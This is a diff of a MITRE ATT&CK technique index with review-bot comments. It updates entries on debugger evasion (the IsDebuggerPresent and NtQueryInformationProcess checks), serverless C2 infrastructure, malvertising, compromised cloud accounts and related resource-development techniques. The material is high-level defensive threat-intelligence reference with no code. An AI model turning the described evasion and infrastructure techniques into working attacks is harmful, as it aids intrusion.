Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as IsDebuggerPresent()
and NtQueryInformationProcess()
, or manually checking the BeingDebugged
flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as OutputDebugStringW()
.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-16T15:05:55.918Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Debugger Evasion
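Review bot: the `modified` timestamp for T1622 moves backwards, from `2022-05-11T14:00:00.188Z` to `2022-04-16T15:05:55.918Z`, and the same happens for several resource-development objects later in this diff while every object also loses `spec_version: '2.1'`. That looks like a switch of upstream source (a different STIX bundle with per-object edit timestamps) rather than an edit to the technique; the PR description should state the new source so reviewers can tell regeneration noise from content changes.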
x_mitre_detection: |-
@@ -51667,7 +52349,6 @@ discovery:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1622
atomic_tests: []
T1124:
@@ -51770,13 +52451,12 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1124
atomic_tests: []
resource-development:
T1583:
technique:
- modified: '2024-02-28T21:13:02.648Z'
+ modified: '2024-10-16T20:03:59.884Z'
name: Acquire Infrastructure
description: |-
Adversaries may buy, lease, rent, or obtain infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Some infrastructure providers offer free trial periods, enabling infrastructure acquisition at limited to no cost.(Citation: Free Trial PurpleUrchin) Additionally, botnets are available for rent or purchase.
@@ -51787,7 +52467,7 @@ resource-development:
phase_name: resource-development
x_mitre_contributors:
- Shailesh Tiwary (Indian Army)
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: "Consider use of services that may aid in tracking of newly
acquired infrastructure, such as WHOIS databases for domain registration information.
@@ -51858,29 +52538,28 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.007:
technique:
- modified: '2022-10-20T21:20:22.578Z'
+ modified: '2024-07-01T20:24:16.562Z'
name: Serverless
description: |-
- Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
+ Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
- Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
+ Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS Apps Script Abuse 2021) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers - making it easier to [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
- x_mitre_detection: ''
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
+ x_mitre_contributors:
+ - Awake Security
x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Awake Security
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Internet Scan: Response Content'
type: attack-pattern
@@ -51904,15 +52583,18 @@ resource-development:
description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+ - source_name: GWS Apps Script Abuse 2021
+ description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+ Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.007:
technique:
- modified: '2024-04-15T23:49:14.558Z'
+ modified: '2024-09-12T19:18:36.583Z'
name: Artificial Intelligence
description: |
Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI)
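Review bot: the new `GWS Apps Script Abuse 2021` reference URL ends in `#google_vignette`, which is a browser-side ad-interstitial fragment rather than part of the article address; suggest trimming it to `https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/` so the reference is stable. The rest of the hunk (spec version to 3.2.0, `spec_version` removal) matches the other objects in this diff.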
@@ -51944,17 +52626,16 @@ resource-development:
url: https://www.microsoft.com/en-us/security/blog/2024/02/14/staying-ahead-of-threat-actors-in-the-age-of-ai/
- source_name: OpenAI-CTI
description: OpenAI. (2024, February 14). Disrupting malicious uses of AI
- by state-affiliated threat actors. Retrieved March 11, 2024.
- url: https://openai.com/blog/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors
+ by state-affiliated threat actors. Retrieved September 12, 2024.
+ url: https://openai.com/index/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.008:
technique:
- modified: '2024-04-19T12:24:40.659Z'
+ modified: '2024-10-15T15:10:59.530Z'
name: Network Devices
description: |-
Adversaries may compromise third-party network devices that can be used during targeting. Network devices, such as small office/home office (SOHO) routers, may be compromised where the adversary's ultimate goal is not [Initial Access](https://attack.mitre.org/tactics/TA0001) to that environment -- instead leveraging these devices to support additional targeting.
@@ -52007,11 +52688,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.008:
technique:
- modified: '2023-04-17T15:32:39.470Z'
+ modified: '2024-10-16T20:10:08.246Z'
name: Malvertising
description: "Adversaries may purchase online advertisements that can be abused
to distribute malware to victims. Ads can be purchased to plant as well as
@@ -52047,7 +52727,7 @@ resource-development:
phase_name: resource-development
x_mitre_contributors:
- Tom Hegel
- - Goldstein Menachem
+ - Menachem Goldstein
- Hiroki Nagahama, NEC Corporation
- Manikantan Srinivasan, NEC Corporation India
- Pooja Natarajan, NEC Corporation India
@@ -52096,43 +52776,12 @@ resource-development:
url: https://labs.guard.io/masquerads-googles-ad-words-massively-abused-by-threat-actors-targeting-organizations-gpus-42ae73ee8a1e
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.004:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
- type: attack-pattern
- created: '2020-10-01T02:14:18.044Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1588.004
- url: https://attack.mitre.org/techniques/T1588/004
- - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
- Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
- source_name: DiginotarCompromise
- url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
- - source_name: Let's Encrypt FAQ
- url: https://letsencrypt.org/docs/faq/
- description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
- October 15, 2020.
- - source_name: Splunk Kovar Certificates 2017
- url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
- description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
- Certificates. Retrieved October 16, 2020.
- - source_name: Recorded Future Beacon Certificates
- url: https://www.recordedfuture.com/cobalt-strike-servers/
- description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
- Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-16T16:19:41.567Z'
name: Digital Certificates
description: |-
Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.
@@ -52145,18 +52794,49 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Certificate: Certificate Registration'
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
+ created: '2020-10-01T02:14:18.044Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1588/004
+ external_id: T1588.004
+ - source_name: DiginotarCompromise
+ description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+ Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+ url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+ - source_name: Recorded Future Beacon Certificates
+ description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+ Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+ url: https://www.recordedfuture.com/research/cobalt-strike-servers
+ - source_name: Splunk Kovar Certificates 2017
+ description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+ Certificates. Retrieved October 16, 2020.
+ url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+ - source_name: Let's Encrypt FAQ
+ description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
+ October 15, 2020.
+ url: https://letsencrypt.org/docs/faq/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
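Review bot: the only substantive change to T1588.004 across this hunk and the preceding deletion is the `Recorded Future Beacon Certificates` entry (URL now `https://www.recordedfuture.com/research/cobalt-strike-servers`, retrieved September 16, 2024) plus the new `revoked: false` and `x_mitre_deprecated: false` flags; the rest is a key reorder that makes the diff large and hides that. Worth noting in the commit message, and confirm that leaving `x_mitre_version: '1.2'` unchanged is intended for a reference-only update.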
T1583.002:
technique:
@@ -52178,7 +52858,7 @@ resource-development:
url: https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/
description: 'Hinchliffe, A. (2019, March 15). DNS Tunneling: how DNS can
be (ab)used by malicious actors. Retrieved October 3, 2020.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T02:49:49.702Z'
name: DNS Server
description: |-
Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.
@@ -52194,8 +52874,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587.003:
technique:
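Review bot: after this hunk T1583.002 has neither `spec_version` nor any `x_mitre_attack_spec_version`, whereas the objects edited earlier in the diff end up with `x_mitre_attack_spec_version: 3.2.0`. The same pattern repeats for T1587.003, T1587.001, T1586.001, T1588.006, T1583.005, T1587.002 and T1584.003 below. If a 3.x value was not added elsewhere in these objects, consumers that branch on the spec version will treat them differently from the rest of the file; either add the key consistently or document that older, unchanged objects intentionally carry none.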
@@ -52217,7 +52895,7 @@ resource-development:
url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
Certificates. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:32:34.604Z'
name: Digital Certificates
description: |-
Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).
@@ -52237,8 +52915,6 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587.001:
technique:
@@ -52277,7 +52953,7 @@ resource-development:
description: 'FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define
a Russian Cyber Threat Group. Retrieved September 17, 2015.'
url: https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-01-14T17:14:27.890Z'
name: Malware
description: |-
Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)
@@ -52298,8 +52974,6 @@ resource-development:
x_mitre_data_sources:
- 'Malware Repository: Malware Content'
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1586.001:
technique:
@@ -52329,7 +53003,7 @@ resource-development:
description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
March 6, 2017.
url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:15:12.169Z'
name: Social Media Accounts
description: "Adversaries may compromise social media accounts that can be used
during targeting. For operations incorporating social engineering, the utilization
@@ -52366,8 +53040,6 @@ resource-development:
x_mitre_data_sources:
- 'Persona: Social Media'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1588.006:
technique:
@@ -52389,7 +53061,7 @@ resource-development:
url: https://nvd.nist.gov/
description: National Vulnerability Database. (n.d.). National Vulnerability
Database. Retrieved October 15, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:16:32.119Z'
name: Vulnerabilities
description: |-
Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database)
@@ -52411,8 +53083,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1583.005:
technique:
@@ -52449,7 +53119,7 @@ resource-development:
description: Brian Krebs. (2016, October 27). Are the Days of “Booter” Services
Numbered?. Retrieved May 15, 2017.
url: https://krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered/
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T02:49:14.664Z'
name: Botnet
description: 'Adversaries may buy, lease, or rent a network of compromised systems that
can be used during targeting. A botnet is a network of compromised systems
@@ -52471,8 +53141,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1608.004:
technique:
@@ -52534,7 +53202,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1587.002:
technique:
@@ -52556,7 +53223,7 @@ resource-development:
description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
31, 2016.
source_name: Wikipedia Code Signing
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:07:08.549Z'
name: Code Signing Certificates
description: |-
Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
@@ -52574,8 +53241,6 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1584.003:
technique:
@@ -52610,7 +53275,7 @@ resource-development:
url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
Shodan. Retrieved October 12, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T15:59:02.770Z'
name: Virtual Private Server
description: |-
Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig)
@@ -52629,33 +53294,31 @@ resource-development:
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- 'Internet Scan: Response Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1586.003:
technique:
- modified: '2022-10-21T14:21:57.991Z'
+ modified: '2024-10-16T21:26:36.312Z'
name: Cloud Accounts
description: |-
- Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
+ Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Additionally, cloud-based messaging services such as Twilio, SendGrid, AWS End User Messaging, AWS SNS (Simple Notification Service), or AWS SES (Simple Email Service) may be leveraged for spam or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)(Citation: Netcraft SendGrid 2024) Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
A variety of methods exist for compromising cloud accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, conducting [Password Spraying](https://attack.mitre.org/techniques/T1110/003) attacks, or attempting to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: MSTIC Nobelium Oct 2021) Prior to compromising cloud accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. In some cases, adversaries may target privileged service provider accounts with the intent of leveraging a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) between service providers and their customers.(Citation: MSTIC Nobelium Oct 2021)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_contributors:
+ - Francesco Bigarella
+ x_mitre_deprecated: false
x_mitre_detection: 'Much of this activity will take place outside the visibility
of the target organization, making detection of this behavior difficult. Detection
efforts may be focused on related stages of the adversary lifecycle, such
as during exfiltration (ex: [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).'
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Francesco Bigarella
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
type: attack-pattern
id: attack-pattern--3d52e51e-f6db-4719-813c-48002a99f43a
created: '2022-05-27T14:30:01.904Z'
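Review bot: most of this hunk is key reordering rather than content change (x_mitre_contributors and x_mitre_deprecated move above x_mitre_detection; x_mitre_platforms and x_mitre_is_subtechnique move below x_mitre_domains), which buries the two substantive edits, the expanded description and the x_mitre_version bump from '1.0' to '1.1'. Consider having the index generator emit keys in a fixed order so that regenerations only diff on substance. The new description text introduces two citation keys, 'Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022' and 'Netcraft SendGrid 2024', which need matching external_references entries on the same object; the following hunk adds them.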
@@ -52665,10 +53328,19 @@ resource-development:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1586/003
external_id: T1586.003
+ - source_name: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022
+ description: 'Dror Alon. (2022, December 8). Compromised Cloud Compute Credentials:
+ Case Studies From the Wild. Retrieved March 9, 2023.'
+ url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
- source_name: Awake Security C2 Cloud
description: 'Gary Golomb and Tory Kei. (n.d.). Threat Hunting Series: Detecting
Command & Control in the Cloud. Retrieved May 27, 2022.'
url: https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/
+ - source_name: Netcraft SendGrid 2024
+ description: Graham Edgecombe. (2024, February 7). Phishception – SendGrid
+ is abused to host phishing attacks impersonating itself. Retrieved October
+ 15, 2024.
+ url: https://www.netcraft.com/blog/popular-email-platform-used-to-impersonate-itself/
- source_name: MSTIC Nobelium Oct 2021
description: Microsoft Threat Intelligence Center. (2021, October 25). NOBELIUM
targeting delegated administrative privileges to facilitate broader attacks.
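Review bot: the two new references use different quoting, the Palo Alto description single-quoted and the Netcraft description a plain multi-line scalar; both are valid here, because the Palo Alto text contains 'Credentials: Case Studies' (a colon-space, which forces quoting) and the Netcraft text does not, but a consistent style would make future additions less error-prone. Both source_name values match the (Citation: ...) tags added to the description in the preceding hunk, so the citations resolve.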
@@ -52676,9 +53348,8 @@ resource-development:
url: https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1586.002:
technique:
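Review bot: spec_version: '2.1' is dropped here and from every other technique object touched by this patch, while x_mitre_attack_spec_version is kept (and bumped to 3.2.0 on this object). spec_version is a required common property on STIX 2.1 objects, so anything downstream that validates or re-exports these entries as STIX will reject them after this change. The commit message should state why the field is removed (for example, that the upstream export this index is generated from no longer carries it), and consumers of the index should be checked before merge.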
@@ -52729,11 +53400,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608.001:
technique:
- modified: '2023-04-11T23:22:49.534Z'
+ modified: '2024-10-16T20:13:40.501Z'
name: Upload Malware
description: |-
Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.
@@ -52746,7 +53416,7 @@ resource-development:
phase_name: resource-development
x_mitre_contributors:
- Kobi Haimovich, CardinalOps
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
If infrastructure or patterns in malware have been previously identified, internet scanning may uncover when an adversary has staged malware to make it accessible for targeting.
@@ -52781,22 +53451,25 @@ resource-development:
url: https://blog.talosintelligence.com/ipfs-abuse/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.001:
technique:
- modified: '2024-04-13T14:03:04.511Z'
+ modified: '2024-09-25T15:26:00.047Z'
name: Domains
description: |-
Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.
